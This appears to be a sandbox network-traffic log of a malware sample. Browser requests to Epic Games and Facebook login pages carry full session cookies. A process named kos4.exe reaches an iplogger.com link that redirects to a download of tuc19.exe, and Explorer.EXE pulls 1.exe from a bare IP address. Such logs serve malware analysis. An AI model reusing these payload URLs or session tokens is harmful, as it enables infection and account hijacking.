x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:45 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-SaN236KENkKXkG0iQO2a7kNXbJo"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 13146
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 204

date: Mon, 30 Oct 2023 06:48:45 GMT
x-powered-by: PHP 7.2.7
vary: Origin
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
cache-control: no-cache
GET

https://www.epicgames.com/id/api/authenticate

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/authenticate HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 13225
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:45 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-SaN236KENkKXkG0iQO2a7kNXbJo"
cache-control: no-cache
content-encoding: gzip
POST

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

POST /id/api/analytics HTTP/2.0
host: www.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
content-type: application/json
x-epic-strategy-flags:
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 14874
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 24
cache-control: no-cache
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:46 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
access-control-allow-origin: https://www.epicgames.com
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"33-oGzTKWDL93diUm3mCQN9NpT8MZU"
cache-control: no-cache
content-encoding: gzip
GET

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

GET /id/api/analytics HTTP/2.0
host: www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-epic-strategy-flags: isolatedTestFlagEnabled=false
x-epic-event-category: null
x-epic-event-action: null
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 15092
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:48 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"44-SaN236KENkKXkG0iQO2a7kNXbJo"
cache-control: no-cache
content-encoding: gzip
POST

https://www.epicgames.com/id/api/analytics

MicrosoftEdgeCP.exe

Remote address:

44.216.163.13:443

Request

POST /id/api/analytics HTTP/2.0
host: www.epicgames.com
origin: https://www.epicgames.com
referer: https://www.epicgames.com/id/login
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
content-type: application/json
x-epic-strategy-flags: isolatedTestFlagEnabled=false
x-epic-event-category: login
x-epic-event-action: login
x-epic-flow: login
x-epic-client-id: undefined
x-epic-display-mode: web
x-epic-platform: WEB
x-epic-duration: 17840
x-epic-access-key: undefined
accept-language: en-US
x-xsrf-token: dfc96122ef234e15ace880165ee8b6b3
accept-encoding: gzip, deflate, br
content-length: 34
cache-control: no-cache
cookie: XSRF-TOKEN=dfc96122ef234e15ace880165ee8b6b3; EPIC_SESSION_REPUTATION=lRifl0tqbegZuPDNvHkWig.TofhDU9-U50R7gPkUySdPmwFul-xm6hUNzI3bmA3F62cFGkWqYG06dymEvU4miQFndUz3QfyH0Nm2aAT7yxv5-Pm7J7Z96CpNsNGTuXtml8NsW9f0KddEtkO1fHB0CxZ-s35vyvKXispxYQx4qXxRbm7PQsVM4kB1bB2lqAsyn5fruD6AzTY1-I6LnOzZXikBsOQHG4yK4PMmwl4-Hgu8PLnQVOo-QOi74tnH0iGCWYBjYAJH0-iC8Lm5LM7X_bm_qNg3Pcn1gaUxgZ2pu6NmHb8wBuAiCjQTWej4Pj4GUm5FdE7nX2-WFB4W1D5x6KEL-ssgsUGi_gqICknYtFYVr-OmB3e8Vz7lV9jQ1UGWNelGlKOaenDB6k8JpoTdrI60NtjuDhmFx3JTPoUabMfLA.1698648521904.86400000.uQoOzK88IQnfwpmPO5cf5g; EPIC_SESSION_AP=WQqIAj_NnqYaCzFYeXNCQQ.RzDEvGUNPL0golYnkUnMwEQOXL2FizKVz8TLzi-wlRYnU7dvhZX9qYqMPZjvCPErWU6lixaitEd4F4octmYje_SqW4NTj--9BLxMV-tHbTwlQ6vA7UacfgAGY3Hhj4wRDLpP9KkU78YkvDc4QgZeXTNtTmecfqMGPksbQO03_YKqTfbKi2KCw6cmBaD1oX1KTRff74n0iEMNXARf3EPOA0c4O9FK7N2_6Q7FHYOeTdaDFQORalJDdUyWCMHb0oZB1S7og2Z_BqGXahUnsTh7yQQ_zFHsvABWDgac_fGDrIvtK0M9pQsxT2xofjiewPL6db3MFGEuU4UT7-zIJVcrmM-0sSqDGC7irGbtcOXm42u3hX93kwbk--2ae57A1LLFoPDzOujY0f-MlVOtH-Zqs1CCJqPjZapvLGXTZZgw44hKI7ErkWyfHmcgBLdvRkkP.1698648521967.86400000.iOt9-zaj1njdnbNh_Gx_Ug; _epicSID=dddac527ae1a44b2ac7563ff46bce1ba; EPIC_DEVICE=eb4ae73b5ac94830876e9e283b0a0824

Response

HTTP/2.0 200

date: Mon, 30 Oct 2023 06:48:50 GMT
content-type: application/json; charset=utf-8
vary: Accept-Encoding
x-powered-by: PHP 7.2.7
access-control-allow-origin: https://www.epicgames.com
vary: Origin, Accept-Encoding
access-control-allow-credentials: true
content-language: en-US
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
referrer-policy: same-origin
content-security-policy: default-src 'self'; style-src 'self' static-assets-prod.epicgames.com static-assets-prod.unrealengine.com
strict-transport-security: max-age=15552000; includeSubDomains
surrogate-control: no-store
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
pragma: no-cache
expires: 0
etag: W/"33-oGzTKWDL93diUm3mCQN9NpT8MZU"
cache-control: no-cache
content-encoding: gzip
DNS

13.163.216.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.163.216.44.in-addr.arpa

IN PTR

Response

13.163.216.44.in-addr.arpa

IN PTR

ec2-44-216-163-13 compute-1 amazonawscom
DNS

iplogger.com

kos4.exe

Remote address:

8.8.8.8:53

Request

iplogger.com

IN A

Response

iplogger.com

IN A

148.251.234.93
GET

https://iplogger.com/2lhi52

kos4.exe

Remote address:

148.251.234.93:443

Request

GET /2lhi52 HTTP/1.1
Host: iplogger.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found

Server: nginx
Date: Mon, 30 Oct 2023 06:48:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: 507197642587707149=1; expires=Wed, 30-Oct-2024 06:48:22 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
Set-Cookie: clhf03028ja=154.61.71.13; expires=Wed, 30-Oct-2024 06:48:22 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict
Expires: Mon, 30 Oct 2023 06:48:22 +0000
Cache-Control: no-store, no-cache, must-revalidate
Location: http://stim.graspalace.com/order/tuc19.exe
Strict-Transport-Security: max-age=604800
Content-Security-Policy: img-src https: data:; upgrade-insecure-requests
Strict-Transport-Security: max-age=31536000
X-Frame-Options: SAMEORIGIN
DNS

stim.graspalace.com

kos4.exe

Remote address:

8.8.8.8:53

Request

stim.graspalace.com

IN A

Response

stim.graspalace.com

IN A

188.114.97.0

stim.graspalace.com

IN A

188.114.96.0
GET

http://stim.graspalace.com/order/tuc19.exe

kos4.exe

Remote address:

188.114.97.0:80

Request

GET /order/tuc19.exe HTTP/1.1
Host: stim.graspalace.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:23 GMT
Content-Type: application/octet-stream
Content-Length: 3037937
Connection: keep-alive
Content-Description: File Transfer
Content-Disposition: attachment; filename=tuc19.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: max-age=120, must-revalidate
Pragma: public
CF-Cache-Status: HIT
Age: 3506
Last-Modified: Mon, 30 Oct 2023 05:49:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=phap67lTiUiVKniwtGWcNJiGG6RJBPu4TrE03n8K573cLwdNH6AEOOegHKBlHHW9jOARGiTPJeVHFJNhnUInCqwyWMX8AJo1aZo4P1ZozngyLi%2B7Yu5oyiTW%2F5L22vTknes5zfNW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 81e1b6585acf66e5-AMS
alt-svc: h3=":443"; ma=86400
DNS

93.234.251.148.in-addr.arpa

Remote address:

8.8.8.8:53

Request

93.234.251.148.in-addr.arpa

IN PTR

Response

93.234.251.148.in-addr.arpa

IN PTR

iploggercom
DNS

0.97.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.97.114.188.in-addr.arpa

IN PTR

Response
DNS

14.15.239.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.15.239.18.in-addr.arpa

IN PTR

Response

14.15.239.18.in-addr.arpa

IN PTR

server-18-239-15-14ams58r cloudfrontnet
GET

http://171.22.28.213/1.exe

Explorer.EXE

Remote address:

171.22.28.213:80

Request

GET /1.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 171.22.28.213

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Wed, 25 Oct 2023 09:36:36 GMT
ETag: "f04c01-6088731047bd5"
Accept-Ranges: bytes
Content-Length: 15748097
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

fbcdn.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbcdn.net

IN A

Response

fbcdn.net

IN A

163.70.151.35
DNS

1.202.248.87.in-addr.arpa

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

1.202.248.87.in-addr.arpa

IN PTR

Response

1.202.248.87.in-addr.arpa

IN PTR

https-87-248-202-1amsllnwnet
GET

https://fbcdn.net/security/hsts-pixel.gif?c=2

MicrosoftEdgeCP.exe

Remote address:

163.70.151.35:443

Request

GET /security/hsts-pixel.gif?c=2 HTTP/2.0
host: fbcdn.net
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

location: https://fbsbx.com/security/hsts-pixel.gif
reporting-endpoints:
cross-origin-opener-policy: same-origin-allow-popups
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
content-type: text/html; charset="utf-8"
x-fb-debug: r/+feZMmrZ/00eIubtirUDLNVH/7EE+DC2PW0rEW6IdRdtrpNiI9scDgl+fskW0FvX8uwFn2r4bMJ2bBaUoWyg==
content-length: 0
date: Mon, 30 Oct 2023 06:48:26 GMT
alt-svc: h3=":443"; ma=86400
DNS

ocsp.r2m02.amazontrust.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

ocsp.r2m02.amazontrust.com

IN A

Response

ocsp.r2m02.amazontrust.com

IN A

18.238.246.206
GET

http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAxnRZO2jQMmUC0dFSq96X0%3D

MicrosoftEdgeCP.exe

Remote address:

18.238.246.206:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAxnRZO2jQMmUC0dFSq96X0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m02.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Mon, 30 Oct 2023 05:29:18 GMT
Last-Modified: Mon, 30 Oct 2023 05:29:15 GMT
Server: ECAcc (amb/6BCB)
X-Cache: Hit from cloudfront
Via: 1.1 11dfc8c750cf42e4f5f3a7296512a1f8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS58-P1
X-Amz-Cf-Id: U7Bt5V7nsHuR7f_8Go8_1mZwXY93lcgwG2_S80Qqo5Ve4e-HdmZG1A==
Age: 4751
GET

http://ocsp.r2m02.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D

MicrosoftEdgeCP.exe

Remote address:

18.238.246.206:80

Request

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRmbQtwnInkvkvr7BNFR%2BS2lTYPjAQUwDFSzVpQw4J8dHHOy%2Bmc%2BXrrguICEAzHgxlKYimnBzkK%2FHb3mC0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: ocsp.r2m02.amazontrust.com

Response

HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: max-age=7200
Date: Mon, 30 Oct 2023 05:10:10 GMT
Last-Modified: Mon, 30 Oct 2023 05:10:06 GMT
Server: ECAcc (amb/6A99)
X-Cache: Hit from cloudfront
Via: 1.1 11dfc8c750cf42e4f5f3a7296512a1f8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: AMS58-P1
X-Amz-Cf-Id: bffECUe2OiNwxOUPEjFpaacLGk7ggMlw71J0z299P6Dj3O65kTanqQ==
Age: 5906
DNS

fbsbx.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

163.70.151.35
GET

https://fbsbx.com/security/hsts-pixel.gif

MicrosoftEdgeCP.exe

Remote address:

163.70.151.35:443

Request

GET /security/hsts-pixel.gif HTTP/2.0
host: fbsbx.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
